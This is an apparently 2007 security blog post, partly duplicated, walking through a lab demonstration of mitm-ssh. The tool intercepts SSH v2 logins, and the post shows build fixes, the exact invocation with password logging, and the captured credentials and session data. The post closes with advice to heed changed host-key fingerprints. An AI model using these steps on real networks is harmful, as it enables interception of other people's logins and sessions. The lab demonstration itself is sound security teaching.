Loving the SSH
I read about GotoSSH.com courtesy of Risk Management Insight. I found a post by the author here, talking about the site being a Ruby on Rails application. terminal23 has a few comments too.
How can this possibly be for real? I mean, why isn't it just "givemeallyourpasswords.com"? I would love to see who is using this service.
Speaking of SSH, one of my Black Hat students brought a SSH v2-capable man-in-the-middle tool to my attention called mitm-ssh by Claes M Nyberg of darklab.org. I gave it a spin on my Ubuntu box. The only problem I had to overcome was not having /usr/local/include/linux/ available, as shown by this error:
I had /usr/src/linux-headers-2.6.17-12/include/linux/ instead, so I just created a symlink.
I installed everything via --prefix=/usr/local/mitm-ssh into /usr/local/mitm-ssh and then tried out the program. I moved my .ssh/known_hosts file so I could show connecting without mitm-ssh running first.
Once I log in you can see the fingerprints for both keys.
Now I start mitm-ssh and tell it to listen on localhost and forward to 10.1.13.4. You would have to use some other means (like ARP poisoning) to get clients to visit my attacker box instead of 10.1.13.4.
Now I connect to localhost to show the correct key entered into known_hosts.
Now I connect to localhost port 2222 where mitm-ssh is listening.
I see the DSA key for localhost (legit) but a different RSA key. That's the mitm-ssh RSA key:
Here is how mitm-ssh sees the activity.
Here's some of the info collected. First, usernames and passwords.
Now data from the client.
Odd, it didn't record anything there. Here's (some) data from the server.
That file shows data from client and server.
Incidentally, SSH v1 is disabled on 10.1.13.4:
In any case, it pays to watch when OpenSSH tells you your key fingerprints have changed. Brian Hatch wrote a good article on SSH Host Key Protection several years ago if you want more details.
How can this possibly be for real? I mean, why isn't it just "givemeallyourpasswords.com"? I would love to see who is using this service.
Speaking of SSH, one of my Black Hat students brought a SSH v2-capable man-in-the-middle tool to my attention called mitm-ssh by Claes M Nyberg of darklab.org. I gave it a spin on my Ubuntu box. The only problem I had to overcome was not having /usr/local/include/linux/ available, as shown by this error:
In file included from mitm-ssh.c:96:
netfilter.h:8:26: error: linux/config.h: No such file or directory
mitm-ssh.c: In function ‘mitm_ssh’:
mitm-ssh.c:512: warning: unused variable ‘a’
mitm-ssh.c: In function ‘target_connect’:
mitm-ssh.c:796: warning: pointer targets in passing argument 1 of
‘packet_get_raw’ differ in signedness
make: *** [mitm-ssh.o] Error 1
I had /usr/src/linux-headers-2.6.17-12/include/linux/ instead, so I just created a symlink.
I installed everything via --prefix=/usr/local/mitm-ssh into /usr/local/mitm-ssh and then tried out the program. I moved my .ssh/known_hosts file so I could show connecting without mitm-ssh running first.
richard@neely:~$ ssh mitm-ssh@10.1.13.4
The authenticity of host '10.1.13.4 (10.1.13.4)' can't be established.
DSA key fingerprint is 83:4f:ed:57:9a:52:3d:29:98:a0:58:f1:21:d1:40:5a.
Are you sure you want to continue connecting (yes/no)? yes
Warning: Permanently added '10.1.13.4' (DSA) to the list of known hosts.
Password:
Last login: Thu Aug 16 21:42:47 2007 from neely.taosecuri
[mitm-ssh@hacom ~]$ ssh-keygen -l -f /etc/ssh/ssh_host_dsa_key.pub
2048 83:4f:ed:57:9a:52:3d:29:98:a0:58:f1:21:d1:40:5a
/etc/ssh/ssh_host_dsa_key.pub
[mitm-ssh@hacom ~]$ ssh-keygen -l -f /etc/ssh/ssh_host_rsa_key.pub
2048 98:cc:ba:6e:b7:0e:76:4e:60:5b:62:8d:07:c7:9c:f6
/etc/ssh/ssh_host_rsa_key.pub
Once I log in you can see the fingerprints for both keys.
Now I start mitm-ssh and tell it to listen on localhost and forward to 10.1.13.4. You would have to use some other means (like ARP poisoning) to get clients to visit my attacker box instead of 10.1.13.4.
richard@neely:~/mitm-ssh$ /usr/local/mitm-ssh/sbin/mitm-ssh
..
/|\ SSH Man In The Middle [Based on OpenSSH_3.9p1]
_|_ By CMN
Usage: mitm-ssh[option(s)]
Routes:
[: ] - Static route to port on host
(for non NAT connections)
Options:
-v - Verbose output
-n - Do not attempt to resolve hostnames
-d - Debug, repeat to increase verbosity
-p port - Port to listen for connections on
-f configfile - Configuration file to read
Log Options:
-c logdir - Log data from client in directory
-s logdir - Log data from server in directory
-o file - Log passwords to file
richard@neely:~/mitm-ssh$ /usr/local/mitm-ssh/sbin/mitm-ssh 10.1.13.4
-n -v -p 2222 -o /tmp/mitm-ssh-pw-log -c /tmp/mitm-ssh-cli
-s /tmp/mitm-ssh-ser
Using static route to 10.1.13.4:22
SSH MITM Server listening on 0.0.0.0 port 2222.
Generating 768 bit RSA key.
RSA key generation complete.
Couldn't create pid file "/var/run/mitm-ssh.pid": Permission denied
Now I connect to localhost to show the correct key entered into known_hosts.
richard@neely:~$ ssh localhost
The authenticity of host 'localhost (127.0.0.1)' can't be established.
DSA key fingerprint is 4d:33:70:24:75:ed:fa:e0:ca:96:18:af:3c:a9:ca:84.
Are you sure you want to continue connecting (yes/no)? yes
Warning: Permanently added 'localhost' (DSA) to the list of known hosts.
richard@localhost's password:
Linux neely 2.6.17-12-generic #2 SMP Mon Jul 16 19:37:58 UTC 2007 i686
richard@neely:~$ ssh-keygen -l -f /etc/ssh/ssh_host_dsa_key.pub
1024 4d:33:70:24:75:ed:fa:e0:ca:96:18:af:3c:a9:ca:84
/etc/ssh/ssh_host_dsa_key.pub
Now I connect to localhost port 2222 where mitm-ssh is listening.
richard@neely:~$ ssh mitm-ssh@localhost -p 2222
WARNING: DSA key found for host localhost
in /home/richard/.ssh/known_hosts:2
DSA key fingerprint 4d:33:70:24:75:ed:fa:e0:ca:96:18:af:3c:a9:ca:84.
The authenticity of host 'localhost (127.0.0.1)' can't be established
but keys of different type are already known for this host.
RSA key fingerprint is e9:9a:2f:e7:6e:c2:2d:9a:11:f3:e1:56:a6:f1:ac:62.
Are you sure you want to continue connecting (yes/no)? yes
Warning: Permanently added 'localhost' (RSA) to the list of known hosts.
Password:
Last login: Thu Aug 16 22:19:35 2007 from neely.taosecuri
I see the DSA key for localhost (legit) but a different RSA key. That's the mitm-ssh RSA key:
$ ssh-keygen -l -f mitm-ssh_host_rsa_key.pub
2048 e9:9a:2f:e7:6e:c2:2d:9a:11:f3:e1:56:a6:f1:ac:62
mitm-ssh_host_rsa_key.pub
Here is how mitm-ssh sees the activity.
WARNING: /usr/local/mitm-ssh/etc/moduli does not exist, using fixed modulus
** Error: getsockopt: Protocol not available
[MITM] Routing SSH2 127.0.0.1:48216 -> 10.1.13.4:22
[2007-08-16 22:24:34] MITM (SSH2) 127.0.0.1:48216 -> 10.1.13.4:22
SSH2_MSG_USERAUTH_INFO_RESPONSE: (mitm-ssh) mitm-ssh
[MITM] Connection from UNKNOWN:48216 closed
Here's some of the info collected. First, usernames and passwords.
$ cat mitm-ssh-pw-log
[2007-08-16 22:24:34] MITM (SSH2) 127.0.0.1:48216 -> 10.1.13.4:22
SSH2_MSG_USERAUTH_INFO_RESPONSE: (mitm-ssh) mitm-ssh
Now data from the client.
$ cat mitm-ssh-cli/ssh2\ 127.0.0.1\:48216\ -\>\ 10.1.13.4\:22
Odd, it didn't record anything there. Here's (some) data from the server.
...edited...
[mitm-ssh@hacom ~]$ ls -al
total 22
drwxr-xr-x 2 mitm-ssh mitm-ssh 512 Aug 16 21:44 .
drwxr-xr-x 19 root wheel 512 Aug 16 21:42 ..
-rw------- 1 mitm-ssh mitm-ssh 160 Aug 16 22:16 .bash_history
-rw-r--r-- 1 mitm-ssh mitm-ssh 767 Aug 16 21:42 .cshrc
-rw-r--r-- 1 mitm-ssh mitm-ssh 248 Aug 16 21:42 .login
-rw-r--r-- 1 mitm-ssh mitm-ssh 158 Aug 16 21:42 .login_conf
...edited...
That file shows data from client and server.
Incidentally, SSH v1 is disabled on 10.1.13.4:
richard@neely:/tmp$ ssh -1 10.1.13.14
Protocol major versions differ: 1 vs. 2
In any case, it pays to watch when OpenSSH tells you your key fingerprints have changed. Brian Hatch wrote a good article on SSH Host Key Protection several years ago if you want more details.
Comments
But yeah, I'm not sure about feeding my ssh passwords into a site, and even though it is RoR, why would you really want to add another layer of complexity into what is essentially a security function?
It's a cool demonstration of the technologies potential, no doubt.
is very much recommened, ssh will refuse
to connect to hosts whose key has changed.